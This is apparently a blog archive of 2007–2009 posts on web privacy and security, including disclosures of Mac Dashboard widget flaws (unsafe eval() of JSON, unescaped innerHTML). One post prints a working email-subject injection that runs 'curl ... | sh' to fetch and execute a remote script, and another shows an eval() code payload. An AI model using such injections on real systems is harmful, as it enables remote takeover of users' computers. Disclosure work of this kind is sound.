
web stuff Archives

June 10, 2007

Forget cookies!

Client-side SQL rules. And it's rather useful: Google -- the site recently rated worst major web destination for privacy by Privacy International (rebuttal 1, rebuttal 2) -- has put out Google Gears, a browser extension which lets you use things like Google Reader in an offline mode. Functionality-wise, this seems to work nicely indeed, and I'll try it again as the next couple of flights come up -- reading blogs certainly sounds like good inflight entertainment.

The extension's key additions to today's infrastructure: You can reliably keep both Web applications and significant amounts of data locally, such as the last 2,000 blog posts, and you can talk to that data store in SQL. Applications that can use these facilities have all the abilities that cookies could ever give them, and then some; cookies simply look boring by comparison.
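From memory of the Gears documentation, the database API looks roughly like this -- the database, table, and column names here are my own, and the code only runs inside a Gears-enabled browser:

```javascript
// Create and open a local, SQLite-backed database through Gears.
var db = google.gears.factory.create('beta.database');
db.open('feed-cache');
db.execute('CREATE TABLE IF NOT EXISTS posts' +
           ' (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');

// Parameterized insert -- the store speaks plain SQL.
db.execute('INSERT INTO posts (title, body) VALUES (?, ?)',
           ['Offline reading', '...']);

// Query it back, even while offline.
var rs = db.execute('SELECT title FROM posts ORDER BY id DESC');
while (rs.isValidRow()) {
  // rs.field(0) is the title column.
  rs.next();
}
rs.close();
```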

It will be interesting to see whether (and how) the community takes up both the functionality enabled and the privacy worries caused by web applications' ability to link interactions much more reliably than today, and to store larger and more structured amounts of data on the client. The tension is, in fact, non-trivial: On the one hand, reliable client-side persistence clearly enables reliable linking of different interactions. On the other hand, applications could be designed to be more privacy-friendly by keeping information on the client and not transmitting it to the server. If anything, this shows that discussions about privacy online can't be limited to the side-effects of this or that technology, but should focus on how the technology (and the data processed) are actually used.

Meanwhile, Opera's Anne van Kesteren points to Erik Arvidsson's blog, which talks about a submission of the interfaces exposed by Google Gears to WHATWG/W3C coming soon. Anne notes the relationship to related work in the HTML5 spec. (W3C's new HTML Working Group took up HTML5 as the basis for discussion with the editors and the WG going forward in May.)

PS: In terms of security models, both the HTML5 and Google Gears work rely on the same-origin policy that's well-known from cookie land.

September 2, 2007

OpenID over WS-Trust?

In an interesting example of how the different identity systems around play together (or not), SXIP has proposed an "OpenID infocards" spec. Allegedly, there is a working implementation around; I haven't tried it, though.

OpenID Information Cards 1.0 - Draft 01
D. Hardt, J. Bufu
Sxip Identity
August 10, 2007

"Infocards" in this context effectively means "OpenID over WS-Trust." Painting with a broad brush, this specification takes OpenID's colon-separated tag-value assertion format and embeds it in WS-Trust.

Signalling that a relying party supports this protocol variant is not interoperable with the signalling used traditionally in OpenID.

An OpenID infocards relying party needs to understand an additional -- though quite lightweight -- protocol exchange which wraps the OpenID token in XML pointy brackets, to Paul Madsen's immense delight.

An OpenID infocards provider needs to implement a WS-Trust Security Token Service.

The protocol interchanges are not interoperable with the ones traditionally used in OpenID: Steps 1-6 of the OpenID protocol are replaced with WS-Trust based interactions. Step 7, in its "direct verification" variant, remains in place, and ensures that the identity (still a URI) remains bound to the overall transaction.

Conversely, there are similar implications for Infocard enabled services that would want to support this scheme; for them, the OpenID infocards spec effectively introduces yet another token format. See Eric Norman's blog.

On its face, this proposal splits the OpenID protocol into two mutually non-interoperable variants: one fitting into Microsoft's CardSpace framework, and one having all the lightweight RESTful karma that makes OpenID interesting to the parts of the Web community that are less than fond of WS-*. The URL-as-identity paradigm is much less central to this variant of OpenID than to the classical one: For much of the protocol exchange, what matters is the endpoint that serves as the Security Token Service. The "identity" URL itself only ever plays a role in the final verification step.

All this points to interesting times ahead, as the various camps in identity space will continue to perform tangled dances.

October 20, 2007

hack.lu: Breaking and Securing Web Applications

At hack.lu, the best talk so far has been Nitesh Dhanjani's Breaking and Securing Web Applications.

Random notes below the fold.


hack.lu: MITMing a room full of security people

In Pwned @ hack.lu, Didier Stevens has a nice screenshot of what a lot of people saw at the conference yesterday. Not trusting the crowd in the room, I had configured my Web browser to go through an SSH tunnel elsewhere, so the software that was affected for me was fetchmail -- which I had fortunately configured paranoid enough that it noticed the wacky certificate that was "shown" by my personal server on port 995, pop3-s, and simply died with a nice error message.
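For the record, the fetchmail knobs that make it die on a bad certificate are ssl and sslcertck. From memory of the fetchmail man page, a paranoid .fetchmailrc looks roughly like this (host, user, and paths made up):

```
poll mail.example.org proto pop3 port 995
  user "me" pass "secret"
  ssl sslcertck sslcertpath /home/me/.certs
```

With sslcertck set, fetchmail refuses to talk to any server whose certificate doesn't verify against the local trust store -- which is exactly what saved me here.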

So, what happened? As I said in a spontaneous lightning talk after that session, my diagnosis was that somebody was running a man-in-the-middle attack on a room full of security people. The tool they were using rewrote the TLS certificates that were shown by servers, but tried to keep the human-readable information in the certificate intact. (As Benny K notes in a comment, "the certificate seemed fine".)

The tool used was most likely ettercap.

Incidentally, I don't mind that this prank was played on all of us. Attending a hacking conference means you're fair game to some extent -- there will be packet sniffing, and there will be active attacks. As long as no lasting damage is caused, and as long as the attacks don't interfere with the conference talks, that's fine. What I found disappointing, though, is that the responsible party didn't have the stomach to give a lightning talk about the results gathered. For instance, I'd love to know how many of the (security-minded!) people in the room actually clicked past the errors that their browsers and mail clients showed. That would be first-class input for the Web Security Context Working Group. (Anecdotal evidence suggests that a few people got rather nervous after they heard the lightning talk...)

Now, for the details...


October 21, 2007

hack.lu: slides

I guess a conference counts as good fun when you go there to listen and end up giving two lightning talks and a not really lightning talk. So, for the record, here we go:

The slides should be linked from the conference program sooner or later.

November 15, 2007

Facebook: Third-party cookies on steroids

In Privacy versus cross-context aggregation, Wendy Seltzer points to stories by David Weinberger and Ethan Zuckerman about facebook's latest marketing coup: When facebook users go shopping online (e.g., with Blockbuster) then their shopping behavior is pushed to facebook and used for advertising. From Weinberger's description:

The new ad infrastructure enables Facebook to extend their reach onto other companies' sites. For example, if you rent a copy of "Biodome" from Blockbuster.com, Blockbuster will look for a Facebook cookie on your computer. If it finds one, it will send a ping to Facebook. The Blockbuster site will pop up a "toast" (= popup) asking if you want to let your friends at Facebook know that you rented "Biodome." If you say yes, next time you log into Facebook, Facebook will ask you to confirm that you want to let your friends know of your recent rental. If you say yes, that becomes an event that's propagated in the news feed going to your friends.

While, technically, Blockbuster can't look for a facebook cookie, it can give facebook the opportunity to look for it itself, and in the process hand off information about the purchase. That can be done through redirects, frames, or any number of other techniques. Some of these techniques involve JavaScript, some don't. Ultimately, what we have here is the return of the 1990s third-party cookie, but on steroids, and used not just to track users' page views, but to link business information across vendors.
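One plausible shape for such a handoff -- all names and URLs below are made up for illustration, not taken from Facebook's actual mechanism -- is the classic third-party resource include:

```html
<!-- On the shop's order-confirmation page: a third-party include
     that carries purchase details in the query string. The browser
     attaches any social.example cookies to this request, letting
     the third party link the purchase to a known account. -->
<script src="http://social.example/beacon?partner=shop&amp;item=Biodome"></script>

<!-- The same works without JavaScript, via an invisible image: -->
<img src="http://social.example/beacon?partner=shop&amp;item=Biodome"
     width="1" height="1" alt="">
```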

(Not having either a facebook or a Blockbuster account, I don't know what precise technique is used; I'd be curious to learn more about that. If anyone feels like drilling down further, Tamper Data and Firebug are among the tools of choice.)

The more general point, though, is independent of the precise mechanism used to pass on the data: Today's Web is an environment in which applications have lots of opportunities to communicate with each other, to aggregate data, and to mash up information from different sources. What is useful infrastructure in a Web 2.0 application becomes a privacy threat when used maliciously.

Enabling social processes becomes key: How can we make sure Web applications' data flows become comprehensible to users -- both from an infrastructure and a usability perspective? And how can we make sure Web application providers state their intentions transparently, providing levers for social and regulatory enforcement? These questions bring us all the way back to P3P; using P3P policies as a trigger for cookie handling in IE6 demonstrated how to use technical capabilities as a lever to enable at least some social transparency of business behavior.

Maybe we need another generation of simple policy languages that enable a similar tie-in, but for a broader set of use cases: placing cookies in HTTP headers is hardly the main concern any more. Forget cookies if you can get client-side SQL and client-side global data storage. Forget web bugs for data leaks if JavaScript can submit() forms cross-domain (XForms have the same feature, but declaratively). And forget forms if events can cause the user's every keypress and mouse click to trigger an XMLHttpRequest() object to phone home (soon cross-domain). In today's environment, the ping attribute on links almost comes as a relief, as it enables easier spotting of tracking techniques -- along with easier tracking. If, as a community, we want to use technical levers to entice Web application providers to behave in a socially transparent and responsible way, then we need to take a comprehensive approach: start to understand what technical control points we still have, and how we can use them.
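For reference, the ping attribute mentioned above looks like this in markup (URLs made up); the browser fires a notification at the ping URL whenever the link is followed:

```html
<a href="http://news.example/story"
   ping="http://tracker.example/click-log">
  an outbound link whose clicks get reported to the tracker
</a>
```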

Meanwhile, our best chance of holding sites honest is the kind of public shaming that facebook is experiencing, law enforcement, and regulation (where applicable) -- if anybody notices what's going on, that is.

December 3, 2007

JSON + eval(): Owning the Dashboard

Twitter has been all the rage for a while; I'll admit that I've been a late adopter (I've had an account since yesterday). It seems useful as a quick news aggregator (with feeds like the NY Times and Heise) -- in particular when coupled to a dashboard widget on the Mac.

There are two dashboard widgets that let you both post and follow: Twitterlex and Twitgit. In plain English, both of these are huge security risks that create an easy way for an attacker on your network to take over your Mac. Uninstall them till there are new versions.

In technical terms, both are relatively simple pieces of JavaScript. Both use JSON to retrieve their data through the Twitter API. Both use eval() to evaluate the JSON data.

And that's a pretty big deal: JSON is short for JavaScript Object Notation. That means that data are encoded in a subset of the JavaScript programming language, the same language that these two widgets are written in. eval(), then, is the simplest way to parse that information: Instead of doing anything fancy, the data are fed to the JavaScript interpreter. Which will do its thing, and duly interpret whatever it is given.

And, for these widgets, there is no sandbox to the rescue: While bad (and unsafe) JavaScript is a matter that affects just the perpetrator when it happens on an ordinary Web page, the sandbox for Dashboard widgets is actually configurable. Needless to say, both widgets use that configurability: They both have the AllowSystem option set, to enable the widget.system() function. That method is used to execute arbitrary command line utilities, i.e., it grants as much control over the system as the user has -- and that often includes control over the /Applications folder.
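From what I understand of the Dashboard widget format, the sandbox is opened through keys in the widget's Info.plist; a fragment along these lines (surrounding plist structure omitted) is all it takes:

```xml
<key>AllowSystem</key>
<true/>
```

With that flag set, widget JavaScript can call something like widget.system("/bin/ls", null).outputString -- a synchronous shell command execution with the user's full privileges.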

Twitterlex, incidentally, at least has a reason to open the sandbox: it uses Growl for notifications. Quickly looking through Twitgit, I couldn't find any such reason, except that there was probably an example somewhere with the same code in it. Twitterlex makes up for this slight advantage by having an update notification mechanism that calls eval() on data retrieved from some URI on the programmer's Web server. What's currently returned from there looks benign; still, this would make for a marvelous backdoor.

How realistic are attacks against this kind of code? Quite realistic. Both widgets check Twitter regularly. Risks -- leaving aside, for a moment, malice on the part of one of the "legitimate" data providers -- include a subverted Twitter server (cross-site scripting will be enough, even though Twitter fortunately appears to be quite paranoid about that), a subverted server on the author's side in the case of Twitterlex, and a man-in-the-middle attack against the data retrieval. The latter is quite easy to launch, as no cryptographic protection is used at all: Either ettercap or a subverted captive portal will do nicely.

All this illustrates some security fundamentals: When there are easy, but insecure, options, people will exercise them. If they can use eval() instead of JSON.parse(), they will do that. If they can break out of a sandbox, they'll do that -- in particular if that doesn't keep the widgets from being installed. And if these two things can be done in one widget to make life more interesting, then that will happen, too.
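The difference between the two parsing strategies is easy to demonstrate. In the sketch below, the payload string stands in for bytes arriving from a subverted server or a man-in-the-middle; JSON.parse is shown as the modern built-in (at the time, Crockford's json2.js provided it):

```javascript
// A "JSON" response as it might arrive over the wire: shaped like
// data, but carrying executable code.
var payload =
  '({"status": (function () { global.pwned = true; return "ok"; })()})';

// The widgets' pattern: feed the wire bytes straight to the
// interpreter. The embedded function runs with full privileges.
var viaEval = eval(payload);

// The safe pattern: a real JSON parser accepts data, nothing else.
var parseError = null;
try {
  JSON.parse(payload);
} catch (e) {
  parseError = e; // rejected -- this payload is not valid JSON
}
```

The eval() path executes the attacker's function as a side effect of "parsing"; JSON.parse throws instead of executing anything.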

Finally, if the same programming platform can be used locally that is known from the Web, then we'll see the same programming style (and mistakes), and we'll see local and Web vulnerabilities blur into each other.

December 4, 2007

Show me a JSON-based Widget...

... and I'll show you an unguarded eval().

Today's examples:

  • The Facebook Widget accesses about a dozen facebook APIs through JSON. It's based on the facebook JS Library. And guess what the parseJSON routine in that library really is? This widget runs with the AllowFullAccess configuration option set.
  • The Flickr Interestingness widget is another culprit. This one only runs with the AllowInternetPlugins flag; if subverted, it might give an attacker access to, say, the latest Quicktime hole. Don't think it's enough to secure your browser.
  • The Hockey Widget doesn't do JSON; instead, it loads some web page and parses an embedded script by, you guessed it, feeding it to eval(), after some minor searching and replacing. AllowNetworkAccess is set.

The bad teaching award of the day goes to the AOL Xdrive developer documentation: The Open XDrive Usage Meter of course accesses XDrive through JSON, and of course it uses eval() to parse. It has a sibling Windows Vista sidebar gadget; same problem. By the way, the security model for these gadgets gives access to ActiveX controls that are not marked "safe for scripting".

Questions?

December 8, 2007

More on widgets: Exploring the Network

In my last musings about widget security, I was very brief about the Flickr Interestingness and Hockey widgets. After all, they both just provide the AllowNetworkAccess capability. I had overlooked that there is a shared cookie store on the Mac, shared, that is, at least by Safari and the Dashboard. From a bit of experimenting, it seems like that sharing affects all non-session cookies.

Now, what does that mean? A widget with the AllowNetworkAccess privilege can issue HTTP requests anywhere. These HTTP requests will carry the same cookies as a request from a just-started Safari instance. Therefore, any Web application that relies on persistent cookies for authentication (like many Web 2.0 services) can be used by such a Widget without the user's permission.
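A sketch of what that looks like from widget JavaScript -- the intranet URL is made up, and note that there is no cookie-handling code anywhere; the shared cookie store does that silently:

```javascript
// Runs inside a widget that has AllowNetworkAccess set.
// No cookie handling in this code -- yet the request goes out
// with the user's persistent Safari cookies attached.
var req = new XMLHttpRequest();
req.open("GET", "http://intranet.example/timesheets/export", false);
req.send(null);
// req.responseText now holds whatever the logged-in user could see.
```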

There are several attack scenarios here: A subverted widget could be a bridgehead behind a corporate firewall, with convenient access to intranet applications. And when a Web 2.0 site serves as the path through which a widget is exploited, then subverting widgets with AllowNetworkAccess might in fact be enough to deploy some rather interesting malware.

December 19, 2007

More on widgets: When one e-mail is enough to break a system.

Excuse the widget blogging hiatus, please; I held back on this one till Google had rolled out a fix.

Our topic today, then, is the Gmail dashboard widget -- a handy dashboard frontend to Google Mail. Like so many other widgets, this one, too, runs with access to the widget.system method. However, the bug in question here does not relate to eval(). Instead, it's script injection into the DOM due to a lack of output cleansing in the client-side JavaScript code. It's, effectively, the same kind of vulnerability that underlies cross-site scripting vulnerabilities in servers; for a change, however, this is a client-side problem.

Consider this code fragment:

      var titleText = MessagesTable
           .getTitleTextFromEntryElement(currentEntry);
      titleText =
          '&nbsp;&nbsp;&nbsp;<span class="title-class">' 
          + titleText
          + '</span>';
      if (Prefs.getShowSnippets()) {
        var summaryText = MessagesTable.getSummary(currentEntry);
        summaryText = '<span class="snippet-class"> - ' 
          + summaryText
          + '</span>';
        titleText += summaryText;
      }
      titleText = "<div class='table-overflow-col'>" 
        + titleText + "</div>";
      ...
      titleColumn.innerHTML = titleText;

The use of the non-standard innerHTML property to write to the DOM here means that, if we can inject tags into the titleText variable, we can actually write tags into that document object model.

Instead of reading more code, I sent a first message to my GMail account, with this subject:

 Subject: <i>italic?</i>

Now, guess how that message came out in the GMail widget... So, we can write tags into the DOM. The simple approach of just dropping some <script> tags into the subject header failed, though: innerHTML doesn't actually execute scripts right away.

However, this worked:

Subject: <a href="#" onmouseover=
  'var foo=widget.system ("curl http://does-not-exist.org/test
  | sh", null).outputString;'><span class="title-class">hi 
  there</span></a>

As soon as the mouse pointer hovered over the subject header of this message, a shell script would be downloaded from my web server, and then executed, with the user's privileges -- the machine was taken over by sending a single e-mail, combined with a likely and innocuous user interaction.

What this example (like the earlier ones) demonstrates is that, as Web technologies move to the desktop, bad coding practices move with them. However, what was once a problem that might affect one server-side application now turns into a way to subvert client computers -- easily, quickly, and thoroughly, and with no more tools than the ability to write a simple e-mail.

Possible fixes to this problem include escaping any user-supplied data that is expected to contain text before feeding it to dangerous constructs such as .innerHTML, or using safer alternatives such as createTextNode.
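The escaping fix can be as small as this -- the function name is mine, not the widget's, and the order matters: '&' must be escaped first, or already-escaped entities get mangled:

```javascript
// A minimal HTML-escaping helper for text destined for innerHTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')   // must come first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// The hostile subject line from above, rendered inert: assigned to
// innerHTML, the escaped string displays as plain text.
var subject = '<a href="#" onmouseover="widget.system(...)">hi</a>';
var safe = escapeHtml(subject);
```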

The recent observations about widgets suggest several more general points, though: On the one hand, figuring out useful security models for widgets is an important task (that the W3C Web Application Formats Working Group, which works on a widget format, will have to take on, together with the various widget vendors).

On the other hand, it's clear that fancy security models are not enough: We need to spread the word about sane programming practices for widgets, and quite likely some code review from those who advertise others' code as safe to download.

Finally, these kinds of issues are not just a problem with widgets: Just this Wednesday, Orkut was hit by a worm that was exploiting server-side cross-site scripting vulnerabilities. As we see more and more cross-site requests and data flows -- either through cross-site XMLHttpRequest, or through deliberate cross-site script inclusion --, we'll see attacks like these cross site boundaries. We'll also see combined server and client-side attacks, just enabled by web technologies.

I hope to talk more about this at this year's Chaos Communication Congress in Berlin, and perhaps at the Web Conference next April in Beijing.

December 28, 2007

When Widgets Go Bad

My lightning talk from 24c3 this morning is up on YouTube.

May 27, 2008

Some recent talks: Usability, Policy languages, Widgets, and HTML5

Blogging has been light here for a while, though Twittering hasn't.

The past few months have seen a busy travel schedule and a number of talks; maybe time to quickly dump links to the various slide sets here:

  • At RSA Conference in San Francisco, I spoke on a panel about security usability with fellow Web Security Context Working Group members Mary Ellen Zurko, Rachna Dhamija, and Phillip Hallam-Baker. No slides, but a reasonably nice discussion.
  • At the Web Conference in Beijing, just two weeks later, I ended up on a panel on policy languages, with Renato Iannella, Piero Bonatti, and Lalana Kagal.
  • Also at the Web Conference, I spoke about Widgets - Web Vulnerabilities for All, taking a look under the hood of some commonly found widgets, and explaining how they can be used to break into your computer. Much as I like that widgets make it easier to write portable network client applications, I think the current platforms' security models make it far too risky to actually run these beasts. We've got some catch-up work to do there.
  • In Web Application Security Issues at the same conference, I also talked about widgets, but then asked what the programming practices there tell us about the future of Web applications, when ever more security-critical code actually runs on the client. That outlook is rather dark right now, in terms of security. (Although it won't get much worse than the current situation.)
  • Finally, I went to nearby Ghent, to talk about HTML5 and what's security relevant in there. Slides here: Would you like fries with that? In short, there's a bunch of good work being done in that spec, but other parts need some serious attention from the security community.

July 3, 2008

Youtube data disclosures: The limits of data governance.

Wired.com reports that a US judge compelled YouTube's owner Google to turn over the site's complete user logs -- including time stamps and IP addresses, which might be used to discover the real-life identity behind a request.

Denied motions in the same decision include the disclosure of Google's and Youtube's search engine source code, private videos, and various database schemata.

Leaving aside that Viacom's demand for assorted crown jewels smells of an attempt to force YouTube into a settlement, the judge's decision really is a staggering example of the limits of data governance: Building data avoidance into protocols and services makes privacy-threatening disclosures hard or impossible; it also limits the usefulness of some services. But approaches that accept (almost unlimited) storage and processing of data (and then rely on technology and procedures to enforce certain rules) are ultimately limited by the ability of the surrounding legal and social system to stick to these rules. That really means two things: On the one hand, the social context needs to hold data processors accountable for the privacy promises that they make. On the other hand, it must not turn into a threat to these promises itself.

This case is a particularly spectacular example of the latter aspect, made worse by an environment in which little is ever forgotten.

Food for thought when you next dump personal data into some Web 2.0 information silo.

July 20, 2008

Si tacuisses, Enrique, ...

Among the great privileges of working at W3C is the occasional geeking with people like Michael Sperberg-McQueen's evil twin Enrique.

Enrique's latest is on what RDF gets us. In that blog item, RDF is characterized as an extremely thin semantic layer -- interestingly, ignoring the RDF Semantics recommendation. The point of that recommendation is that RDF is -- even when you ignore RDF schema, OWL and friends -- more than just nodes, arrows, and URIs.


February 22, 2009

Facebook me!

While I'm usually comfortable using social networks of all kinds, I hadn't ever joined Facebook.

Well, the recent ruckus about their terms of service tickled my interest sufficiently that I finally gave in. There really is no such thing as bad publicity for facebook.

Now, what's interesting about it for this latecomer? Besides not finding much actually useful or new on facebook (well, perhaps except for new lows in advertising), two points really struck me. First, an incredibly simple user interface, literally going out of the way when it should, making it as easy as at all possible to let me do what I'd most likely want to do -- and all that, of course, within the walled garden's fences. As an exhibit, consider the exchange between Ann Bassetti and myself up there: With Twitter, I'd have linked to it. In Facebook, it seems like I can't do that, so your only chance is going into the walled garden and trying to search for it. Second, a subtle persuasion that I'm safe and secure there. For the first couple of "friends", I'm bothered with a CAPTCHA (which goes away eventually), to "make sure I'm legit"; when I "friend" somebody who isn't in the "same network" as I am, I'm politely told that (and why!) I can't see their profile. Nothing like letting your users softly run into limits if you want to convince them that they're protected by these limits -- and that you, by enforcing them, are their friend. Remember: Facebook is your friend, it is not scary, and it helps you keep your privacy. There is nothing that Facebook would ever do wrong with your data. It helps you keep your privacy.

It's almost fortunate, then, that Facebook also inflicted one of its little indiscretions on me...

(Screenshot: iphone.png)

I hadn't quite told the world that I had given in to that particular temptation, yet, despite some misgivings on principles. Well, this takes care of that.

So, what's the conclusion? So far, Facebook indeed very much looks like Hotel California, with nice rooms, and a somewhat chatty concierge. Nothing to see here as far as I'm concerned, except for network effects in action, and some really neat persuasion packed into UI.

(Good that I can use Twitter to update my status.)

March 27, 2009

Persistence is hard.

Keeping historical documents around is hard, as my native city of Cologne painfully experienced a few weeks ago, when the city archive collapsed.

But it's also hard on the web. Case in point: a number of important early specifications for the Web (like pre-standard SSL, or the original cookie spec) have traditionally been sitting at netscape.com URIs. Unfortunately, AOL seems to have pulled these pages around the time it disbanded the remains of Netscape.

While the wayback machine helps us out this time, one would wish that organizations that acquire historically important technology spent more effort preserving the documents they have. With the consolidation that the economic crisis will bring, I fear that this hasn't been the last time that these kinds of historical documents disappear from their canonical location.

About web stuff

This page contains an archive of all entries posted to No Such Weblog in the web stuff category. They are listed from oldest to newest.

